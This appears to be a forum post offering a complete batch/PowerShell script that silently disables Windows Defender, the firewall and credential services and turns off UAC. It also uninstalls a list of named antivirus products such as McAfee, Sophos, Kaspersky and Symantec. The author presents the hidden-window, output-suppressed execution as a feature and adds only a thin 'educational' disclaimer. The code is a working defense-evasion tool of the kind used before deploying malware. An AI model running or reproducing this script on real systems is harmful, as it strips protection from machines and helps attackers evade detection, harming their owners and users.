Today, I will be sharing with you a comprehensive script designed to disable a broad range of security features in a Windows environment, including both native Windows services and third-party security solutions.
This script is intended strictly for educational purposes, to illustrate how various Windows security features operate and can be manipulated. It is strongly advised against using this script in a live, production environment, as it will significantly reduce the security posture of the system, leaving it vulnerable to potential threats.
Now let's dive into the details:
The script starts by defining a list of services to disable. These services include those related to Windows Defender, Windows Firewall, Credential Manager, Software Protection, and more.
Following that, a range of registry keys under 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' and 'HKLM:\System\CurrentControlSet\Services\Netman' are modified to disable various features of Windows Defender and network connections.
Next, the script identifies a list of third-party security applications like McAfee, AVG, Symantec, Webroot, and others, and attempts to uninstall them. This is achieved using the WMI (Windows Management Instrumentation) interface to find and uninstall these applications.
In the final steps, the script disables the User Account Control (UAC) and various Windows Defender features, once again by manipulating registry keys and using PowerShell commands.
Here's the twist: the script is designed to run silently. It achieves this by using the "-WindowStyle Hidden" option for the PowerShell process and redirecting all output to null (> $null). This means the script will run in a hidden window and suppress all output, making its activities invisible on the surface. However, do note that some operations, like uninstalling applications, may still cause visible activity or prompts.
The script can be modified as you see fit.
Disabling security services will expose the system to potential threats, so it's crucial to understand the implications of each step in the script below.
Stay curious, and keep learning!
Code:
@echo off
powershell.exe -WindowStyle Hidden -Command "
$windowsServices = @(
'WdBoot',
'WdFilter',
'WdNisDrv',
'WdNisSvc',
'WinDefend',
'SecurityHealthService',
'mpssvc',
'SharedAccess',
'KeyIso',
'VaultSvc',
'sppsvc',
'CertPropSvc',
'SCPolicySvc'
)
foreach ($service in $windowsServices) {
Set-Service -Name $service -StartupType 'Disabled' > $null
}
$registryPaths = @(
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting',
'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet',
'HKLM:\System\CurrentControlSet\Services\Netman'
)
$registryValues = @{
'DisableAntiSpyware' = 1;
'DisableAntiVirus' = 1;
'MpEnablePus' = 0;
'DisableBehaviorMonitoring' = 1;
'DisableIOAVProtection' = 1;
'DisableOnAccessProtection' = 1;
'DisableRealtimeMonitoring' = 1;
'DisableScanOnRealtimeEnable' = 1;
'DisableEnhancedNotifications' = 1;
'DisableBlockAtFirstSeen' = 1;
'SpynetReporting' = 0;
'SubmitSamplesConsent' = 0;
'Start' = 4;
}
foreach ($path in $registryPaths) {
if (!(Test-Path -Path $path)) { New-Item -Path $path -Force > $null }
foreach ($key in $registryValues.Keys) {
New-ItemProperty -Path $path -Name $key -Value $registryValues.$key -PropertyType 'DWORD' -Force > $null
}
}
$programs = @(
'Webroot SecureAnywhere',
'Symantec Endpoint Protection',
'AVG 2015',
'McAfee VirusScan Enterprise',
'McAfee Agent',
'McAfee DLP Endpoint',
'McAfee Endpoint Security Platform',
'McAfee Endpoint Security Threat Prevention',
'Microsoft Security Client',
'Malwarebytes Managed Client',
'Sophos System Protection',
'Sophos AutoUpdate',
'Sophos Remote Management System',
'McAfee SiteAdvisor Enterprise',
'Symantec Backup Exec Remote Agent for Windows',
'ESET File Security',
'Norton AntiVirus',
'Kaspersky Anti-Virus',
'Avast Antivirus',
'Bitdefender Antivirus'
)
foreach ($program in $programs) {
$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -eq $program }
if ($app) { $app.Uninstall() > $null }
}
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0
Set-MpPreference -DisableRealtimeMonitoring $true > $null
Uninstall-WindowsFeature -Name Windows-Defender -Quiet -Restart > $null
" > $null